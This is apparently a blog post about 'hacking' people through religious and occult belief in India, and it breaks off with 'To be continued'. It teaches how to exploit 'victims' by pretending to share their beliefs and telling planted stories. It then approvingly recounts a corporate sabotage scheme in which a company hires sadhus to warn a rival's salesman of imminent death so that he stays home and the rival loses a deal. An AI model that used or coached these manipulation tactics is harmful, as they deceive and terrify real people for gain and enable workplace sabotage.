The home interiors, design and furniture is largely determined by “vaastu shastra” in many Indian homes. Even today, new apartments or flats are rejected if they do not satisfy the aspects of Vaastu! So if you are a builder, you have a slightly better chance of selling your newly constructed buildings / homes if you promote them as designed as per Vaastu Shastra in certain parts of India!

Huge donations are given in name of “Pooja” or “Homam” which are held almost every month some place or other to ward of evil spirits, seek blessings of god and bring peace and harmony. The revenue generated by these donations qualify the religious bodies to be listed in Stock markets! For example, the annual turnover of “Tirumala Tirupati Devasthanam” (One of the largest religious bodies in India) is over “135,093,956.32″ USD! Not to mention reserves.

Again, some of the largest riots and acts of violence are due to differences between religious communities. We have witnessed thousands of people being killed on the name of religion and justice. As they say, even today most people are judged by the color of their skin.

People and Belief

As we saw from the above examples, it does not matter if you believe in any forms of occult or religion. What matters is many people do. And this belief is the single largest factor to utilize it for your advantage. Over many years i have noticed that gaining trust is easiest when you share your victims belief or add weight to it by your experiences or stories.

It is not hard to find out if your victim can be exploited or not. One can start with a simple sociological game like “nowadays” or “Ain’t it awful” and quickly move towards stating a personal problem that got resolved due to a certain “practice”. For instance, one can say “you know, i was thinking of purchasing this plot, but luckily i had been to this astrologer and you won’t believe it, he said i should not make the purchase as it was not a good period. Just yesterday i came to know that the plot was actually having a lot of legal issues and that it had being seized.” Depending on the person or place, stories like this might actually work. If you sound convincing enough, then your victim asks for the address and decides to test the astrologer out.

If you can recollect your days at college, there would be at least one guy who would have claimed to read hands, and all girls would flock around him to ask the same stupid questions, “When will i get married?”; “Will i go abroad?”; “Will my husband be good looking?”; “Will i get first class in my exams?” or more family oriented ones like “Will i always take care of my mother and father?”; “What about my mothers health?” or “Will i get a job soon?” and things like that.

To tell you how serious this can be, once out of frustration i replied to a girl that she will have two marriages and that she would get a divorce from her first husband within six months. Before i could realize, she fainted out of shock and fell down the staircase. It was very difficult for me to later tell her that it was just a joke and that she would actually be happy in a single long lasting marriage. This is not an isolated case.

People believe “predictions” when given in a right environment and though most of them can act as “self-fulfilling prophecies”, it is natural to be concerned when you are warned of danger.

Now how can ones belief help you in hacking? In any business, if crucial sales professionals or account managers leave a company or are not available for active follow up, they will lose a great amount of business to competitors. Is there any way we can “hack” into a TAM or pre-sales professionals mind and make them not report to office for a few days for a possible business advantage?

A Real Corporate Sabotage example using Occult

In Mumbai, at Andheri, there are over 3000 companies with corporate offices. On any given working day, there are over 120 odd IT security Pre-sales guys trying to sell their services in various sectors. In such a cut throat competition, it is vital that presentations or proposals are given on time. It is also obvious that not all can qualify for certain jobs and that only few competitors remain in the end.

Company X wanted the deal at all costs. What can it do to prevent company Y from winning this order? It was then that they tried out a simple plan. Krishna (let’s say) was a pre-sales guy working with company Y. He used to commute daily from Dombivili to Andheri by local train via Dadar. Company X studied the daily activity of Krishna for a few days and strategically sent a sadhu early morning at his area.

When Krishna came out as usual for going to office, the sadhu came forward and asked for a rupee but instead stopped haphazardly and gave him a cold spooky stare before saying “your death is near… you are going die in a train accident in less than a week” (In reality, it was very dramatic). Saying this he gave a “you-are-doomed” laugh and quickly walked away.

Now what do you think would be the effect? Surprised, Krishna paused for a few seconds and regained his composure before moving to his work place as usual. After two days, company X sent another sadhu who “accidentally” crossed Krishna’s path and suddenly froze before giving him the “look”.

This time the sadhu said “son, your life is in danger. Stay at home and recite the ‘hanuman chalisa’ everyday if you want the danger to pass away.” Blessing him, the sadhu started moved away chanting mantras. But this time Krishna quickly called him and asked what the danger was. The Sadhu replied that the period was extremely bad for him for he has not fulfilled a promise made to god. And the only way out was to stay indoors for a week or so chanting ‘hanuman chalisa’ 108 times a day. During this time he should not travel anywhere as it would surely put him in danger of losing his life.

Even now, the company X did not know how Krishna would react to all this. Krishna thanked the Sadhu, gave him a 50 Rupee note and moved towards office. But soon the two separate incidents of being warned of death put Krishna in the desired state of mind. By the time he reached Dadar, he changed his mind and went back home instead of office. In the next few hours Krishna called in “sick”.

With an able pre-sales guy not attending office due to “sudden illness” had its toll on the overall aggressiveness of the business of company Y. Even though company Y sent out another sales guy to handle the job, he did not share the same rapport and comfort as Krishna did with his customers. In less than a week, company X was able to close a crucial deal from an energy based company that was worth over INR .85,00,000/- because of less competition.

As for Krishna, he traveled with great caution for the next one month in local trains.

If you feel that the above incident was just a coincidence and that not all would fall for such a story, then wait until a sadhu comes round the corner and tells you something worse about your little son or daughter.

To be continued…